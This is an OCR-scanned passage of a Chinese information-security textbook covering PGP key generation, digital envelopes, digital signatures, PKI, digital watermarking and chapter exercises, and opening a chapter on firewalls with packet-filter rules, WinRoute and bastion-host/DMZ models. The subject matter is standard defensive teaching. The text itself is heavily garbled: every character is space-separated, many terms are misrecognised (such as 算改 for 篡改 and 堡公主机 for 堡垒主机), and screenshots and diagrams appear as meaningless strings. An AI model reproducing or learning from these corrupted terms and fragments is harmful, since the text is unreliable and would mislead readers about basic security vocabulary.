non-alphabetic characters. 


[v] Hide Typing 


Passphrase: 


| 


koten La ) 


图 4-13 输入 密码 


T PGPkeys 
File Edit View Keys Server Groups Help 
h MA A A A 


Va.. | Trust Size Description 
Trom FY mzz 2048/1024 DH/DSS key pair 


Don l 
图 4-14 ”生成 密 钥 


45 数字 信封 和 数字 签名 


公 钥 密码 体制 在 实际 应 用 中 主要 包含 数字 信封 和 数字 签名 两 种 方式 。 
4.5.1 数字 信封 


数字 信封 是 公 钥 密码 体制 在 实际 中 的 一 个 应 用 ,是 用 加 密 技 术 来 保证 只 有 规定 的 特定 
收 信人 才能 阅读 通信 的 内 容 。 

在 数字 信封 中 ,信息 发 送 方 采 用 对 称 密 钥 来 加 密 信息 内 容 , 然 后 将 此 对 称 密 钥 用 接收 方 
的 公开 密 钥 来 加 密 ( 这 部 分 称 数字 信封 ) 之 后 ,将 它 和 加 密 后 的 信息 一 起 发 送 给 接收 方 ; 接 
收 方 先 用 相应 的 私有 密 钥 打开 数字 信封 ,得 到 对 称 密 钥 ,然后 使 用 对 称 密 钥 解 开 加 密 信息 。 
这 种 技术 的 安全 性 相当 高 。 数 字 信 封 主要 包括 数字 信封 打包 和 数字 信封 拆 解 ,数字 信封 打 
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包 是 使 用 对 方 的 公 钥 将 加 密 密 钥 进行 加 密 的 过 程 ,只 有 对 方 的 私 钥 才 能 将 加 密 后 的 数据 ( 通 
信和 密 钥 ) 还 原 ; 数字 信封 拆 解 是 使 用 私 钥 将 加 密 过 的 数据 解密 的 过 程 。 

数字 信封 的 功能 类 似 于 普通 信封 ,普通 信封 在 法 律 的 约束 下 保证 只 有 收 信人 才能 阅读 
信 的 内 容 ; 数字 信封 则 采用 密码 技术 保证 了 只 有 规定 的 接收 人 才能 阅读 信息 的 内 容 。 数 字 
信封 中 采用 了 对 称 密码 体制 和 公 钥 密码 体制 。 信 息 发 送 者 首先 利用 随机 产生 的 对 称 密码 加 
密 信息 ,再 利用 接收 方 的 公 钥 加 密 对 称 密码 ,被 公 钥 加 密 后 的 对 称 密码 被 称 为 数字 信封 。 在 
传递 信息 时 ,信息 接收 方 若 要 解密 信息 ,必须 先 用 自己 的 私 钥 解 密 数 字 信 封 , 得 到 对 称 密 码 ， 
才能 利用 对 称 密码 解密 所 得 到 的 信息 。 这 样 就 保证 了 数据 传输 的 真实 性 和 完整 性 。 

在 一 些 重要 的 电子 商务 交易 中 密 钥 必须 经 常 更 换 , 为 了 解决 每 次 更 换 密 钥 的 问题 ,数字 
信封 结合 对 称 加 密 技 术 和 公开 密 钥 技术 的 优点 ,克服 了 私有 密 钥 加 密 中 私有 密 钥 分 发 困难 
和 公开 密 钥 加 密 中 加 密 时 间 长 的 问题 ,使 用 两 个 层次 的 加 密 来 获得 公开 密 钥 技术 的 灵活 性 
和 私有 密 钥 技术 高 效 性 。 信 息 发 送 方 使 用 密码 对 信息 进行 加 密 , 从 而 保证 只 有 规定 的 收 信 
人 才能 阅读 信 的 内 容 。 采 用 数字 信封 技术 后 ,即使 加 密 文件 被 他 人 非法 截获 ,因为 截获 者 无 
法 得 到 发 送 方 的 通信 密 钥 , 故 不 可 能 对 文件 进行 解密 。 


4.5.2 数字 签名 


数字 签名 在 ISO 7498 一 2 标准 中 定义 为 :“ 附 加 在 数据 单元 上 的 一 些 数据 ,或 是 对 数据 
单元 所 做 的 密码 变换 ,这 种 数据 和 变换 允许 数据 单元 的 接收 者 用 以 确认 数据 单元 来 源 和 数 
据 单 元 的 完整 性 ,并 保护 数据 ,防止 被 人 (例如 接收 者 ) 进 行 伪造 "。 美 国电 子 签 名 标准 
(DSS,FIPS186-2) 对 数字 签名 做 了 如 下 解释 :“ 利 用 一 套 规则 和 一 个 参数 对 数据 计算 所 得 
的 结果 ,用 此 结果 能 够 确认 签名 者 的 身份 和 数据 的 完整 性 ”。 

所 谓 “ 数 字 签 名 ”就 是 通过 某 种 密码 运算 生成 一 系列 符号 及 代码 组 成 电子 密码 进行 签 
名 ,来 代替 书写 签名 或 印章 ,对 于 这 种 电子 式 的 签名 还 可 进行 技术 验证 ,其 验证 的 准确 度 是 
一 般 手工 签名 和 图 章 的 验证 无 法 比拟 的 “数字 签名 ”是 目前 电子 商务 .电子 政务 中 应 用 最 
广泛 .技术 最 成 熟 . 可 操作 性 最 强 的 一 种 电子 签名 方法 。 它 采用 了 规范 的 程序 和 科学 的 方 
法 ,用 于 鉴定 签名 人 的 身份 以 及 对 一 项 电子 数据 内 容 的 认可 。 

在 文件 上 手写 签名 长 期 以 来 被 用 作 作 者 身份 的 证 明 , 或 表明 签名 者 同意 文件 的 内 容 。 
实际 上 ,签名 体现 了 以 下 5 个 方面 的 保证 。 

(1) 签名 是 可 信 的 。 签 名 使 文件 的 接收 者 相信 签名 者 是 慎重 地 在 文件 上 签名 的 。 

(2) 签名 是 不 可 伪造 的 。 签 名 证 明 是 签名 者 而 不 是 其 他 的 人 在 文件 上 签字 。 

(3) 签名 不 可 重用 。 签 名 是 文件 的 一 部 分 ,不 可 能 将 签名 移动 到 不 同 的 文件 上 。 

(4) 签名 后 的 文件 是 不 可 变 的 。 在 文件 签名 以 后 ,文件 就 不 能 改变 。 

(5) 签名 是 不 可 抵赖 的 。 签 名 和 文件 是 不 可 分 离 的 ,签名 者 事后 不 能 声称 他 没有 签 过 
这 个 文件 。 

目前 可 以 提供 “数字 签名 ”功能 的 软件 很 多 ,用 法 和 原理 都 大 同 小 异 , 其 中 比较 常用 的 有 
OnSign。 安 装 OnSign 后 ,在 Word、Outlook 等 程序 的 工具 栏 上 ,就 会 出 现 OnSign 的 快捷 
按钮 ,每 次 使 用 时 , 需 输入 自己 的 密码 ,以 确保 他 人 无 法 资 用。 对 于 使 用 了 OnSign 寄 出 的 文 
件 , 收 件 人 也 需要 安装 OnSign 或 OnSign Viewer, 这 样 才 具备 识别 “数字 签名 ”的 功能 。 根 
据 OnSign 的 设计 ,任何 文件 内 容 的 自 改 与 拦截 都 会 让 签名 失效 。 因 此 当 对 方 识别 出 你 的 
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“数字 签名 ”, 就 能 确定 这 份 文件 是 由 你 本 人 所 发 出 的 ,并 且 中 途 没 有 被 算 改 或 拦截 过 。 当 然 
如 果 收 件 人 还 不 放心 ,也 可 以 单 击 “ 数 字 签名 ”上 的 蓝 色 问号 ,OnSign 就 会 再 次 自动 检查 ,如 
果 文 件 有 问题 ,“ 数 字 签 名 ”上 就 会 出 现 红色 的 警告 标志 。 具 体 使 用 见 实验 10。 

在 电子 邮件 使 用 频繁 的 网 络 时 代 , 使 用 好 “数字 签名 ”, 就 像 传统 信件 中 的 “挂号 信 ”, 无 
疑 为 网 络 传输 文件 的 安全 又 增加 了 一 道 保护 屏障 。 


4.5.3 PKI 公 钥 基础 设施 


PKI(Public Key Infrastruction, 公 钥 基 础 设施 ) 可 以 提供 数据 单元 的 密码 变换 ,并 能 使 
接收 者 判断 数据 来 源 及 对 数据 进行 验证 。 

PKI 的 核心 执行 机 构 是 电子 认证 服务 提供 者 , 即 通称 为 认证 机 构 (Certificate 
Authority,CA)。PKI 签名 的 核心 元 素 是 由 CA 签发 的 数字 证 书 。 它 所 提供 的 PKI 服务 就 
是 认证 ,数据 完整 性 .数据 保密 性 和 不 可 否认 性 。 它 的 做 法 就 是 利用 证 书 公 钥 和 与 之 对 应 的 
私 钥 进行 加 /解密 ,并 产生 对 数字 电文 的 签名 及 验证 签名 。 数 字 签 名 是 利用 公 钥 密码 技术 和 
其 他 密码 算法 生成 一 系列 符号 及 代码 组 成 电子 密码 进行 签名 ,来 代替 书写 签名 和 印章 ,这 种 
电子 式 的 签名 还 可 进行 技术 验证 ,其 验证 的 准确 度 是 在 物理 世界 中 对 手工 签名 和 图 章 的 验 
证 无 法 比拟 的 。 这 种 签名 方法 可 在 很 大 的 可 信 PKI 域 人 群 中 进行 认证 ,或 在 多 个 可 信 的 
PKI 域 中 进行 交叉 认证 , 它 特 别 适用 于 互联 网 和 广域网 上 的 安全 认证 和 传输 。 


4.6 数字 水 印 


4.6.1 数字 水 印 的 定义 


数字 水 印 (digital watermarking) 技 术 是 将 一 些 标识 信息 ( 即 数字 水 印 ) 直 接 租 入 数字 载 
体 (包括 多 媒体 、 文 档 、 软 件 等 ) 当 中 ,但 不 影响 原 载 体 的 使 用 价值 ,也 不 容易 被 人 的 知觉 系统 
(如 视觉 或 听觉 系统 ) 觉 察 或 注意 到 。 通 过 这 些 隐藏 在 载体 中 的 信息 ,可 以 达到 确认 内 容 创 
建 者 .购买 者 \、 传 送 隐 秘 信 息 或 者 判断 载体 是 否 被 算 改 等 目的 。 水 印 与 源 数据 紧密 结合 并 隐 
藏 其 中 ,成 为 源 数 据 不 可 分 离 的 一 部 分 ,并 可 以 经 历 一 些 不 破坏 源 数据 使 用 价值 或 商用 价值 
的 操作 而 存活 下 来 。 


4.6.2 数字 水 印 的 基本 特征 


根据 信息 隐藏 的 目的 和 技术 要 求 .数字 水 印 应 具有 以 下 三 个 基本 特性 。 

1. 隐藏 性 (透明 性 ) 

水 印信 息 和 源 数 据 集成 在 一 起 ,不 改变 源 数 据 的 存储 空间 ,嵌入 水 印 后 , 源 数据 必须 没 
有 明显 的 降 质 现象 ,水 印信 息 无 法 为 人 看 见 或 听见 ,只 能 看 见 或 听见 源 数 据 。 

2. 和 鲁 棒 性 (免疫 性 、 强 壮 性 ) 

鲁 棒 性 是 指 戏 入 水 印 后 的 数据 经 过 各 种 处 理 操作 和 攻击 操作 以 后 ,不 导致 其 中 的 水 印 
信息 丢失 或 被 破坏 的 能 力 。 处 理 操作 包括 模糊 、 几 何 变 形 、 放 缩 、 压 缩 、 格 式 变换 、 剪 切 、D/A 
和 A/D 转换 等 。 攻 击 操作 包括 有 损 压 缩 、 多 拷贝 联合 攻击 、 剪 切 攻击 、 解 释 攻 击 等 。 
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3. 安全 性 
安全 性 指 水 印信 息 隐藏 的 位 置 及 内 容 不 为 人 所 知 ,这 需要 采用 隐蔽 的 算法 ,以 及 对 水 印 
进行 预 处 理 ( 如 加 密 ) 等 措施 。 


4.6.3 数字 水 印 的 应 用 领域 


多 媒体 通信 业务 和 Internet 一 一 数字 化 、 网 络 化 ?的 迅猛 发 展 给 信息 的 广泛 传播 提供 
了 前 所 未 有 的 便利 ,各 种 形式 的 多 媒体 作品 包括 视频 、 音 频 、 动 画 、 图 像 等 纷纷 以 网 络 形式 发 
布 ,但 其 副作用 也 十 分 明显 ,任何 人 都 可 以 通过 网 络 轻易 地 取得 他 人 的 原始 作品 ,尤其 是 数 
字 化 图 像 .音乐 .电影 等 ,甚至 不 经 作者 的 同意 而 任意 复制 .修改 ,从 而 侵害 了 创作 者 的 著作 
权 。 随 着 数字 水 印 技术 的 发 展 ,数字 水 印 的 应 用 领域 也 得 到 了 扩展 ,数字 水 印 的 基本 应 用 领 
域 是 版 权 保 护 、 隐 藏 标识 、 认 证 和 安全 不 可 见 通信 。 

当 数 字 水 印 应 用 于 版 权 保 护 时 ,应 用 市 场 在 于 电子 商务 、 在 线 或 离线 地 分 发 多 媒体 内 容 
以 及 大 规模 的 广播 服务 。 数 字 水 印 用 于 隐藏 标识 时 ,可 在 医学 制图、 数字 成 像 .数字 图 像 监 
控 、 多 媒体 索引 和 基于 内 容 的 检索 等 领域 得 到 应 用 。 数 字 水 印 的 认证 方面 主要 应 用 于 ID 
卡 、 信 用 卡 `.ATM 卡 等 上 面 。 数 字 水 印 的 安全 不 可 见 通信 将 在 国防 和 情报 部 门 得 到 广泛 的 
应 用 。 多 媒体 技术 的 飞速 发 展 和 Internet 的 普及 带 来 了 一 系列 政治 经济. 军事 和 文化 问 
题 ,数字 水 印 的 应 用 领域 包括 以 下 5 个 方面 。 

1. 数字 作品 的 知识 产权 保护 

数字 作品 (如 计算 机 美术 ,扫描 图 像 、 数 字音 乐 .视频 三 维 动画 ) 的 版 权 保 护 是 当前 的 热 
点 问题 。 由 于 数字 作品 的 复制 、 修 改 非常 容易 ,而 且 可 以 做 到 与 原作 完全 相同 ,所 以 原创 者 
不 得 不 采用 一 些 严 重 损害 作品 质量 的 办 法 来 加 上 版 权 标志 ,而 这 种 明显 可 见 的 标志 很 容易 
被 筑 改 “数字 水 印 ? 利 用 数据 隐藏 原理 使 版 权 标志 不 可 见 或 不 可 听 , 既 不 损害 原作 品 , 又 达 
到 了 版 权 保护 的 目的 。 目 前 ,用 于 版 权 保护 的 数字 水 印 技术 已 经 进入 了 初步 实用 化 阶段 ， 
IBM 公司 在 其 “数字 图 书馆 ”软件 中 就 提供 了 数字 水 印 功能 , Adobe 公司 也 在 其 著名 的 
Photoshop 软件 中 集成 了 Digimarc 公司 的 数字 水 印 插件 。 

2. 商务 交易 中 的 票据 防伪 

随 着 高 质量 图 像 输 入 输出 设备 的 发 展 ,特别 是 精度 超过 1 200dpi 的 彩色 喷 墨 .激光 打印 
机 和 高 精度 彩色 复印 机 的 出 现 , 使 得 货币 .支票 以 及 其 他 票据 的 伪造 变 得 更 加 容易 。 另 一 方 
面 ,在 从 传统 商务 向 电子 商务 转化 的 过 程 中 ,会 出 现 大 量 过 渡 性 的 电子 文件 ,如 各 种 纸 质 票 
据 的 扫描 图 像 等 。 即 使 在 网 络 安全 技术 成 熟 以 后 ,各 种 电子 票据 也 还 需要 一 些 非 密码 的 认 
证 方式 。 数 字 水 印 技术 可 以 为 各 种 票据 提供 不 可 见 的 认证 标志 ,从 而 大 大 增加 了 伪造 的 
难度 。 

3. 证 件 真 伪 鉴 别 

信息 隐藏 技术 可 以 应 用 的 范围 很 广 ,作为 证 件 来 讲 , 每 个 人 需要 不 止 一 个 证 件 , 证 明 个 
人 身份 的 有 身份 证 .护照 ,驾驶 证 .出 人 证 等 ; 证 明 某 种 能 力 的 有 各 种 学 历 证 书 、 资 格 证 书 
等 。 国 内 目前 在 证 件 防 伪 领 域 面临 巨大 的 商机 ,由 于 缺少 有 效 的 措施 ,使 得 “造假 ”"“ 买 假 ”、 
“用 假 ” 成 风 , 已 经 严重 地 干扰 了 正常 的 经 济 秩序 ,对 国家 的 形象 也 有 不 良 影响 。 通 过 水 印 技 
术 可 以 确认 该 证 件 的 真 伪 ,使 得 该 证 件 无 法 仿制 和 复制 。 
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4. 声 像 数 据 的 隐藏 标识 和 算 改 提示 

数据 的 标识 信息 往往 比 数据 本 身 更 具有 保密 价值 .如 遥感 图 像 的 拍摄 日 期 经 /纬度 等 。 
没有 标识 信息 的 数据 有 时 无 法 使 用 ,但 直接 将 这 些 重 要 信息 标记 在 原始 文件 上 又 很 危险 。 
数字 水 印 技术 提供 了 一 种 隐藏 标识 的 方法 ,标识 信息 在 原始 文件 上 是 看 不 到 的 ,只 有 通过 特 
殊 阅读 程序 才 可 读 取 。 该 方法 已 被 国外 一 些 公 开 的 遥感 图 像 数 据 库 所 采用 。 此 外 ,数据 的 
自 改 提示 也 是 一 项 很 重要 的 工作 。 现 有 的 信号 拼接 和 灸 戏 技 术 可 做 到 “移花接木 而 不 为 人 
知 , 因 此 ,如 何 防范 对 图 像 .录音 .录像 数据 的 算 改 攻击 是 重要 的 研究 课题 。 基 于 数字 水 印 的 
算 改 提示 是 解决 这 一 问题 的 理想 技术 途径 ,通过 隐藏 水 印 的 状态 可 以 判断 声 像 信 号 是 否 被 
自 改 。 

s. 隐蔽 通信 及 其 对 抗 

数字 水 印 所 依赖 的 信息 隐藏 技术 不 仅 提供 了 非 密 码 的 安全 途径 ,更 引发 了 信息 战 尤其 
是 网 络 情报 战 的 革命 ,产生 了 一 系列 新 颖 的 作战 方式 ,引起 了 许多 国家 的 重视 。 网 络 情报 战 
是 信息 战 的 重要 组 成 部 分 ,其 核心 内 容 是 利用 公用 网 络 进行 保密 数据 传送 。 然 而 ,经 过 加 密 
的 文件 往往 是 混乱 无 序 的 ,容易 引起 攻击 者 的 注意 。 网 络 多 媒体 技术 的 广泛 应 用 使 得 利用 
公用 网 络 进行 保密 通信 有 了 新 的 思路 ,利用 数字 化 声 像 信号 相对 于 人 的 视觉 ,听觉 元 余 , 可 
以 进行 各 种 时 ( 空 ) 域 和 变换 域 的 信息 隐藏 ,从 而 实现 隐蔽 通信 。 


4.6.4 ”数字 水 印 的 嵌入 方法 
所 有 嵌入 数字 水 印 的 方法 都 包含 一 些 基本 的 构造 模块 , 即 一 个 数字 水 印 嵌 入 系统 和 一 


个 数字 水 印 提 取 系 统 。 数 字 水 印 的 嵌入 过 程 如 图 4-15 所 示 。 
Bm 


载体 数据 / 水 印 罕 入 算法 加 入 水 印 后 的 数据 


密 钥 K 
图 4-15 数字 水 印 的 嵌入 过 程 


该 系统 的 输入 是 水 印 .载体 数据 和 一 个 可 选择 的 公 钥 或 者 私 钥 。 水 印 可 以 是 任何 形式 
的 数据 ,比如 数值 .文本 或 者 图 像 等 。 密 钥 可 用 来 加 强 安 全 性 ,以 避免 未 授权 方 算 改 数字 水 
印 。 所 有 的 数字 水 印 系统 至 少 应 该 使 用 一 个 密 钥 ,有 的 甚至 是 几 个 密 钥 的 组 合 。 当 数字 水 
印 与 公 钥 或 私 钥 结合 时 ,嵌入 水 印 的 技术 通常 分 别称 为 私 钥 数 字 水 印 和 公 钥 数字 水 印 技术 ， 
数字 检测 过 程 如 图 4-16 所 示 。 
水 印 W 或 者 原 载体 数据 


测试 数据 7 水 印 检测 算法 广 -一生 水 印 不 或 可 信 度 值 


密 钥 K 
图 4-16 数字 水 印 的 检测 过 程 
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J a 

一 、 填空 题 

1. 数字 水 印 应 具有 三 个 基本 特性 : 隐藏 性 、 和 

2. 按 密 角 方式 划分 ,把 密码 分 为 和 

3. 密码 的 基本 功能 包括 š 和 

A. 对 称 算法 中 加 密 密 钥 和 解密 密 钥 ,公开 密 钥 算法 中 加 密 密 钥 和 解密 密 
钥 

5. DES 算法 的 入口 参数 有 三 个 : Key、Data、Mode。 其 中 ,Key 为 ,是 DES 算 
法 的 工作 密 钥 ; Data 为 ,是 要 被 加 密 或 解密 的 数据 ; Mode 为 DES 的 工作 方式 ,有 
两 种 : 或 

6. S 盒 的 工作 原理 是 

7. RSA 公开 密 钥 密码 体制 是 一 种 基于 的 公 钥 体系 ,在 公开 密 钥 密码 体制 中 ， 
加 密 密 钥 是 信息 ,而 解密 密 钥 是 。 加 密 算 法 和 解密 算法 也 都 是  — . 

8. PGP 加 密 系统 是 采用 与 相 结 合 的 一 种 加 密 技术 。 

二 、 简 答题 

1. 数字 信封 的 原理 是 什么 ? 


2. 什么 是 数字 签名 ? 数字 签名 的 特点 是 什么 ? 
3. 什么 是 数字 水 印 ? 应 用 在 哪些 方面 ? 
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学 习 目 标 ; 
a 掌握 防火 墙 和 入 侵 检 测 的 定义 ,设置 。 

e 掌握 分 组 过 滤 防 火 墙 的 定义 、 入 侵 检 测 系 统 的 步骤 。 
m 了 解 防火 墙 系统 模型 ,了 解 入 侵 检 测 系 统 的 方法 。 


5.1 防 K 墙 


5.1.1. 防火 墙 的 概念 


防火 墙 (Firewall) 是 一 项 协助 确保 信息 安全 的 设备 ,会 依照 特定 的 规则 ,允许 或 是 限制 
传输 的 数据 通过 。 防 火 墙 可 以 是 一 台 专 属 的 硬件 ,也 可 以 是 架设 在 一 般 硬件 上 的 一 套 软 件 。 
所 谓 防火 墙 指 的 是 一 个 由 软件 和 硬件 设备 组 合 而 成 ,在 内 部 网 和 外 部 网 之 间 、 专 用 网 与 公共 
网 之 间 的 界面 上 构造 的 保护 屏障 ,是 一 种 获取 安全 性 方法 的 形象 说 法 , 它 是 一 种 计算 机 硬件 
和 软件 的 结合 ,使 Internet 与 Intranet 之 间 建 立 起 一 个 安全 网 关 (security gateway) ,从 而 保 
护 内 部 网 免 受 非法 用 户 的 侵入 。 防 火 墙 主要 由 服务 访问 规则 、 验 证 工具 、 包 过 滤 和 应 用 网 关 
4 个 部 分 组 成 。 防 火 墙 就 是 一 个 位 于 计算 机 和 它 所 连接 的 网 络 之 间 的 软件 或 硬件 。 该 计算 
机 流入 流出 的 所 有 网 络 通信 和 数据 包 均 要 经 过 此 防火 墙 。 

在 网 络 中 ,所 谓 “ 防 火 墙 ", 是 指 一 种 将 内 部 网 和 公众 访问 网 (如 Internet) 分 开 的 方法 ， 
它 实 际 上 是 一 种 隔离 技术 。 防 火 墙 是 在 两 个 网 络 通信 时 执行 的 一 种 访问 控制 尺度 , 它 能 多 
许 用 户 “ 同 意 ” 的 人 和 数据 进入 网 络 , 同 时 将 “不 同意 ”的 人 和 数据 拒 之 门 外 , 最 大 限度 地 阻止 
网 络 中 的 黑客 来 访问 用 户 的 网 络 。 换 句 话 说 ,如 果 不 通 过 防火 墙 ,公司 内 部 的 人 就 无 法 访问 
Internet, Internet 上 的 人 也 无 法 和 公司 内 部 的 人 进行 通信 。 

Windows XP 系统 .Windows 7 的 防火 墙 相 比 于 以 往 的 Windows 系统 新 增 了 许多 的 网 
络 功能 ,可 以 很 方便 地 定义 过 滤 掉 数据 包 , 例 如 ,Internet 连接 防火 墙 (ICF) ,就 是 用 一 段 “ 代 
码 墙 ?把 计算 机 和 Internet 分 隔 开 ,时 刻 检查 出 入 防火 墙 的 所 有 数据 包 , 决 定 拦截 或 是 放行 
哪些 数据 包 。 防 火 墙 可 以 是 一 种 硬件 、 固 件 或 者 软件 ,例如 专用 防火 墙 设备 就 是 硬件 形式 的 
防火 墙 , 包 过 滤 路 由 器 是 嵌 有 防火 墙 固件 的 路 由 器 ,而 代理 服务 器 等 软件 就 是 软件 形式 的 防 
火 墙 。 
5.1.2. 防火 墙 的 分 类 

常见 的 防火 墙 有 三 种 类 型 : 分 组 过 滤 防 火 墙 ,应 用 代理 防火 墙 ,状态 检测 防火 墙 。 

1. 分 组 过 滤 防 火 墙 


作用 在 协议 组 的 网 络 层 和 传输 层 , 可 视 为 一 种 IP 封包 过 滤器 ,运作 在 底层 的 TCP/IP 
协议 堆栈 上 。 可 以 以 枚 举 的 方式 ,只 允许 符合 特定 规则 的 封包 通过 ,其 余 的 一 概 禁止 穿越 防 
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火 墙 。 这 些 规 则 通常 可 以 经 由 管理 员 定 义 或 修改 ,根据 分 组 包头 源 地 址 .目的 地 址 和 端口 
号 .协议 类 型 等 标志 确定 是 否 允 许 数据 包 通过 ,只 有 满足 过 滤 逻 辑 的 数据 包 才 被 转发 到 相应 
的 目的 地 的 出 口 端 ,其 余 的 数据 包 则 从 数据 流 中 丢弃 。 

建立 防火 墙 规 则 集 的 基本 方法 有 两 种 :“ 明 示人 允许 ”型 或 “明示 禁止 型。 明示 禁止 的 防 
火 墙 规则 ,默认 允许 所 有 数据 通过 防火 墙 , 而 这 种 规则 集中 定义 的 , 则 是 不 允许 通过 防火 墙 
的 流量 。 换 言 之 ,与 这 些 规则 不 匹配 的 数据 ,全 部 是 允许 通过 防火 墙 的 。 明示 允许 的 防火 墙 
正好 相反 , 它 只 允许 符合 规则 集中 定义 规则 的 流量 通过 ,而 其 他 所 有 的 流量 都 被 阻止 。 

明示 允许 型 防火 墙 能 够 提供 对 于 传 出 流量 更 好 的 控制 ,这 使 其 更 适合 那些 直接 对 
Internet 公 网 提供 服务 的 系统 的 需要 。 它 也 能 够 控制 来 自 Internet 公 网 到 私有 网 络 的 访问 
类 型 。 所 有 和 规则 不 匹配 的 流量 都 会 被 阻止 并 记录 在 案 。 一 般 来 说 ,明示 人 允许 防火 墙 要 比 
明示 禁止 防火 墙 更 安全 ,因为 它们 显著 地 减少 了 允许 不 希望 的 流量 通过 而 可 能 造成 的 风险 。 
例如 ,定义 的 防火 墙 的 规则 集 如 表 5-1 所 示 。 

表 5-1 防火 墙 规则 的 定义 
组 序号 动作 源 IP 目的 IP 源 端 口 目的 端口 协议 类 型 


1 允许 10.1.1.1 * * * TCP 
2 允许 * 10.1.1.1 20 * TCP 
3 禁止 * 10.1.1.1 20 «1024 TCP 


第 一 条 规则 : 主机 10. 1. 1. 1 任何 端口 访问 任何 主机 的 任何 端口 ,基于 TCP 的 数据 包 
都 允许 通过 。 

第 二 条 规则 : 任何 主机 的 20 端口 访问 主机 10. 1. 1. 1 的 任何 端口 ,基于 TCP 的 数据 包 
允许 通过 。 

第 三 条 规则 : 任何 主机 的 20 端口 访问 主机 10. 1. 1. 1 小 于 1024 的 端口 ,如 果 基 于 TCP 
的 数据 包 都 禁止 通过 。 

案例 5-1: 用 WinRoute 创建 包 过 滤 规则 , 见 实验 11。 

WinRoute 这 个 软件 则 除了 具有 代理 服务 器 的 功能 外 ,还 具有 防火 墙 \NAT、 邮 件 服务 
器 .DHCP 服务 器 .DNS 服务 器 等 功能 ,目前 应 用 比较 广泛 。 目 前 比较 常用 的 是 WinRoute 
Firewall 5 ,安装 文件 如 图 5-1 所 示 。 

WinRoute Firewall 5 不 仅 是 一 个 防火 墙 软件 ,其 中 还 包含 支持 DSL. Cable Modems, 
ISDN ,Satellite,dial-up or wireless Internet 等 联机 的 联机 共享 功能 ,该 软件 也 具有 病毒 防 
护 的 功能 ,可 以 帮助 监控 HTTP 和 FTP 联机 进出 是 否 有 危害 的 病毒 。 

2. 应 用 代理 防火 墙 

也 叫 应 用 网 关 (Application Gateway) , 它 作 用 在 应 用 层 ,其 特点 是 完全 “阻隔 ”网 络 通 信 
流 ,通过 对 每 种 应 用 服务 编制 专门 的 代理 程序 ,实现 监视 和 控制 应 用 层 通 信 流 的 作用 。 实 际 
中 的 应 用 网 关 通 常 由 专用 工作 站 实现 。 

应 用 代理 是 运行 在 防火 墙 上 的 一 种 服务 器 程序 .防火 墙 主机 可 以 是 一 个 具有 两 个 网 络 
接口 的 双重 宿主 主机 ,也 可 以 是 一 个 堡垒 主机 。 

代理 服务 器 被 放置 在 内 部 服务 器 和 外 部 服务 器 之 间 ,用 于 转 接 内 外 主机 之 间 的 通信 , 它 
可 以 根据 安全 策略 来 决定 是 否 为 用 户 进行 代理 服务 。 代 理 服 务 器 运行 在 应 用 层 ,因此 又 被 
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Welcome to the InstallShield Wizard for Kerio 
WinRoute Firewall 5.0.0 RC 4 


The InstallShield? Wizard wil install Kerio WinRoute 
Firewall 5.0.0 RC 4 on your computer. To continue, click. 
Nes. 


图 5-1 WinRoute Firewall 5 的 安装 
称 为 * 应 用 网 关 ”。 例 如 , 一 个 应 用 代理 可 以 限制 FTP 用 户 只 能 够 从 Internet 上 获取 文件 ， 
而 不 能 将 文件 上 载 到 Internet 上 。 
3. 状态 检测 防火 墙 


直接 对 分 组 里 的 数据 进行 处 理 , 并 且 结 合 前 后 分 组 的 数据 进行 综合 判断 ,然后 决定 是 否 
允许 该 数据 包 通过 。 


5.1.3. 常见 防火 墙 系统 模型 


常见 防火 墙 系统 一 般 按 照 4 种 模型 构建 : 筛选 路 由 器 模型 . 单 宿主 煲 垒 主机 (屏蔽 主机 
防火 墙 ) 模 型 , 双 宿 主 堡垒 主机 模型 (屏蔽 防火 墙 系统 模型 ) 和 屏蔽 子 网 模型 。 

(1) 筛选 路 由 器 模型 是 网 络 的 第 一 道 防 线 , 功 能 是 实施 包 过 滤 。 创 建 相应 的 过 滤 策略 
时 对 工作 人 员 的 TCP/IP 的 知识 有 相当 的 要 求 ,如 果 筛 选 路 由 器 被 黑客 攻破 ,那么 内 部 网 络 
将 变 得 十 分 危险 。 该 防火 墙 不 能 够 隐藏 内 部 网 络 的 信息 ,不 具备 监视 和 日 志 记录 功能 。 典 
型 的 筛选 路 由 器 模型 如 图 5-2 所 示 。 


进行 包 过 滤 


路 由 器 


(2) 单 宿 主 堡 公主 机 (屏蔽 主机 防火 墙 ) 模 型 由 包 过 滤 路 由 器 和 堡 公主 机 组 成 。 该 防火 
墙 系 统 提供 的 安全 等 级 比 包 过 滤 防 火 墙 系统 要 高 ,因为 它 实现 了 网 络 层 安全 ( 包 过 滤 ) 和 应 
用 层 安 全 (代理 服务 )。 所 以 入 侵 者 在 破坏 内 部 网 络 的 安全 性 之 前 ,必须 首先 渗透 两 种 不 同 


5-2 筛选 路 由 器 模型 
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的 安全 系统 。 单 宿主 堡垒 主机 的 模型 如 图 5-3 所 示 。 


全 区 域 


Hd aare AREUTIRIER GE 8 EBLEUMEL EL 

I A 打印 机 只 允许 外 部 与 保生 主机 通信 
m— 
PiK 


tu C end D 
Hs3 单 宿 主 堡垒 主机 


G) 双 宿 主 堡垒 主机 模型 (屏蔽 防火 墙 系统 ) 可 以 构造 更 加 安全 的 防火 墙 系统 。 双 宿主 
煲 垒 主机 有 两 种 网 络 接口 ,但 是 主机 在 两 个 端口 之 间 直 接 转 发 信息 的 功能 被 关 掉 了 。 在 物 
理 结构 上 强行 使 所 有 去 往 内 部 网 络 的 信息 经 过 堡垒 主机 。 双 宿主 堡垒 主机 模型 如 图 5-4 
所 示 。 


所 有 通信 都 必须 通过 堡 双 主机 
通过 登录 到 堡 至 主机 获得 服务 


查找 对 应 的 策略 


数据 包 


防火 二 
sa 一 Ce D 


(4) 屏蔽 子 网 模型 用 了 两 个 包 过 滤 路 由 器 和 一 个 堡垒 主机 。 它 是 最 安全 的 防火 墙 系 
统 之 一 ,因为 在 定义 了 “中 立 区 ”(Demilitarized Zone, DMZ) 网 络 后 , 它 支持 网 络 层 和 应 用 
层 安 全 功能 。 网 络 管理 员 将 堡 驹 主机、 信息 服务 器 、Modem 组 以 及 其 他 公用 服务 器 放 在 
DMZ 网 络 中 。 如 果 黑 客 想 突破 该 防火 墙 ,必须 攻破 以 上 三 个 单独 的 设备 ,模型 如 图 5-5 
所 示 。 

六 难点 说 明 : 堡 公主 机 是 一 种 被 强化 的 可 以 防御 进攻 的 计算 机 ,作为 进入 内 部 网 络 的 
一 个 检查 点 ,以 达到 把 整个 网 络 的 安全 问题 集中 在 某 个 主机 上 解决 ,从 而 省 时 省 力 , 不 用 考 
虑 其 他 主机 的 安全 的 目的 。 

